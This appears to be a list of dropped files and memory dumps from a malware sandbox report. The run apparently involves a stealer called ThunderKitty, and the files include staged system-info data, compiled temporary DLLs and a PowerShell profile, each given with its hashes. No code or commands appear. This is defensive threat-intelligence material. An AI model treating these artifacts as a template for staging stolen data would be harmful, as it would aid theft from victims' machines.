
Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ed949e851cb81653c2d6dca88f9349e0

SHA1
f2aaad5f1eb3262f8f1681551081fb4b65149a03

SHA256
f23be59e4b003e2fa64298d99b8b38eea824d9317d2aacbb1c09233a026393a6

SHA512
94b0a8051966ac99af93c8c044f8c52430e03ab07a262942dc22b1b2268149510e602b8aa3b4e5d1518e16f04d215017429bb44a71f44b5663154cdf94326a70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
23aba7e7ecd37fd9f076dbd4d6e981e2

SHA1
40150b7db90f125b7b1c7cae65250f3a13a5bbb3

SHA256
a67ce8b05ec37c76167b8769946b840cee681b0c3a19b8d7c56835ad21221b12

SHA512
fce8455921832c8960e1aa783091b83fe17aa885b0a86e92d2ada35c76bfc79122d90b0260f6571018d7317ffee0c3bedc7f0bbf4d21a41e77d02e25892d3c9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
502789a8235e033cb31752ce0b128048

SHA1
8767b3e9c4d6cccc62c362582672e55f2889b3aa

SHA256
8a63155ce461cce0cd6ce748834275d2fa4ef69708e5c6d6036fc6dd6b0d87e5

SHA512
2a85aa65035afd119cbb2747985271ed23ff24e2345b00be48b56091467a02df91aefc132cb364d77e51af653119a5f8d63dcec67d16ed9117206b16a58eae66

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA7B9.tmp

Filesize
1KB

MD5
5e89d9756e029a693b0113d636af2940

SHA1
9551246faecca7467d6471af92f912500734605b

SHA256
6c109681194f377043a12150fd9fb6faab390f32faed296b3909ae9220632b19

SHA512
5d9134bdd99369628e8833e99fecf4afa3cd36ffd9b8436b4826ab1a21b8c303ff1e72bafe7b36b15ba032f7b917b0e2cb248cd246c6c8f8f7b06d2b9199ec5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA7BA.tmp

Filesize
1KB

MD5
362be926829f410a43bf5b0b9c91b923

SHA1
5f3c742e355655a755646f8ff6f2df3770d87317

SHA256
23770807bf355d481fe2e76c0af01755fdb83f32c76214fc77d80c73208f6d73

SHA512
4f55346c7da86cc86cd1599961a81ff8864794cf7b2c3a980026c1405057a10cc91a1f16afe9450b6ea524be60b7f2fd9ec43bc8208a59c194344e485209bcdd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
229KB

MD5
79652f8d7f51d85bfb175f1adc81ae89

SHA1
d5d4611001f9406cb3d4058a362f716b9795d7ea

SHA256
adbf7ee33b8dfb4ced5fd42eb2f6a19f375af2c34ade79a03d702c3d6440898c

SHA512
4b5c89dc4640006a8fb387fa17f0b0a8ba106761ba801d94f6e4394701245feb54db759e044a81d5d5689d29cc2cbce0eaedaf1ef07abdc67f243b6fab349d06

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
23KB

MD5
7f5284ed5a4990ba5f0e154622d2e882

SHA1
0cf66c1bbfab7264068a19d70e29475e13e9ed35

SHA256
6718192e57183874f15783d58c87c6970c3cae9aaea5b192a1540cc052268863

SHA512
e2efc9f4ccd851695dbff6da8d607b01d85e1739a0462d205eba4aead1a1b1ee440eb41c48d3291d1d79793771bd0741cde83158b95d2c72cdfc1616f2db8384

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_03hbnml1.ewc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cb4kai0b\cb4kai0b.dll

Filesize
4KB

MD5
35e7c6d568bbee6520178118b9d6761b

SHA1
787ddd0f62d01b38963feff5584223f9575cfb7e

SHA256
61b5dda9f9461227356649dbbdb8289f35767557770e9c3a38f86bf4d1b16d2f

SHA512
6b2d0a61beca39e1b0efe9f3eb1ac02c2e7090597fd5545addeb9f81655a92f28fefae3b2f68017bf4e6d891a77d6791c2428c9cb5fa6f809692bd421a9b4b30

Download Submit
C:\Users\Admin\AppData\Local\Temp\dxv33ixt\dxv33ixt.dll

Filesize
4KB

MD5
ee01a7d327885d437f82951be1dbb5b2

SHA1
d89e9db0f5e49c4c60f0b9f305859b696928f89f

SHA256
f94529bfecd72188165df9a7d185a5c01eb430155c49049bd6a0e38e1ab22c88

SHA512
7dab926369db6a28f8924e41a500cbf2a8f42af82e96a8d6c309ef02bbaf5cf0bd48ceb94042d6d860f97e2bf9466e69e646150b84e0c770b20b6ae0890a6806

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cb4kai0b\CSCB212010135B7428BAC648C3050BDE7FE.TMP

Filesize
652B

MD5
3e11e24e4fad3168d425c0842014f799

SHA1
86493559e99279bca88a947ac47f84b7968d2dd0

SHA256
b633ed7be039f90674917a1f1e02402c2ca003e18362dee2dc24fa08a181c479

SHA512
f384ea597dc1acbb062504ca5d30bd334f93e768d3f598a18da75e98a4401f9fe234c8142354e7811549f3c40b3af994cceadee6c055573daf8d24427102b331

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cb4kai0b\cb4kai0b.cmdline

Filesize
369B

MD5
59809f891c6eb252e25927cef168f2d6

SHA1
49d1c62cc1eafe4702fa7cccb55bbfed51fd4086

SHA256
eb6dbbd7096307e0c38951750cd439b70629677183cc0162048f581927e22496

SHA512
6668f01b7da45ef68aec9bc72516c8b604027c48d832a3ac49e5a95b356475633256e4b1e2af9058fb8e1e4e1f2005fe3f208866b5da09835cc5d48a34e0e426

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dxv33ixt\CSC5D75F4BE956D4899BC715D2AA2892DB.TMP

Filesize
652B

MD5
0b1864a860e2469254372252d81710bc

SHA1
cec1d78375bcd7da22b84ad6e36a1489b7adce16

SHA256
6656c289e06eebe6fbb80ffce2153bd5a6ea0353e4b9a6cc1b36b0f22c1b94b0

SHA512
f369f6790f6d5075162265eb734a0b53f7fdbf303abed459c69f133d1e34adcc7cdb083f00b04fd7abbd1ee909fd80508da05b297c75fdb72cef01051f090554

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dxv33ixt\dxv33ixt.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dxv33ixt\dxv33ixt.cmdline

Filesize
369B

MD5
b3b91edc34f4cf298bf2c137bf13b675

SHA1
1559fc119255d1deef569f7f480afaaece869349

SHA256
fb0a3efc7f80e38732aeb75f45c1ba4353bee3f0943ba7cca3f8eaea9513bdef

SHA512
1a34762b12f0e2652a010d77edb51db3a2f92700efdd4a1328adb09b4aff1a0ed0cccb52830977ec09f7f553cff155cda9d92c2d56737f75993fe19cfc3f7153

Download Submit
memory/3004-74-0x00000214B2A10000-0x00000214B2A18000-memory.dmp

Filesize
32KB

Download
memory/3004-92-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/3004-42-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/3004-91-0x00000214B26D0000-0x00000214B28EC000-memory.dmp

Filesize
2.1MB

Download
memory/3004-32-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/3004-12-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/3584-95-0x000001CB62500000-0x000001CB6252A000-memory.dmp

Filesize
168KB

Download
memory/3584-85-0x000001CB62980000-0x000001CB63126000-memory.dmp

Filesize
7.6MB

Download
memory/3584-77-0x000001CB493C0000-0x000001CB493C8000-memory.dmp

Filesize
32KB

Download
memory/3584-142-0x000001CB61A70000-0x000001CB61C8C000-memory.dmp

Filesize
2.1MB

Download
memory/3584-133-0x000001CB624E0000-0x000001CB624EA000-memory.dmp

Filesize
40KB

Download
memory/3584-96-0x000001CB62500000-0x000001CB62524000-memory.dmp

Filesize
144KB

Download
memory/3584-132-0x000001CB62500000-0x000001CB62512000-memory.dmp

Filesize
72KB

Download
memory/3628-112-0x000001ADABD20000-0x000001ADABF3C000-memory.dmp

Filesize
2.1MB

Download
memory/4636-44-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/4636-69-0x000001AE37280000-0x000001AE3749C000-memory.dmp

Filesize
2.1MB

Download
memory/4636-0-0x00007FFAD8AF3000-0x00007FFAD8AF5000-memory.dmp

Filesize
8KB

Download
memory/4636-11-0x000001AE375D0000-0x000001AE375F2000-memory.dmp

Filesize
136KB

Download
memory/4636-72-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download
memory/4636-1-0x00007FFAD8AF0000-0x00007FFAD95B1000-memory.dmp

Filesize
10.8MB

Download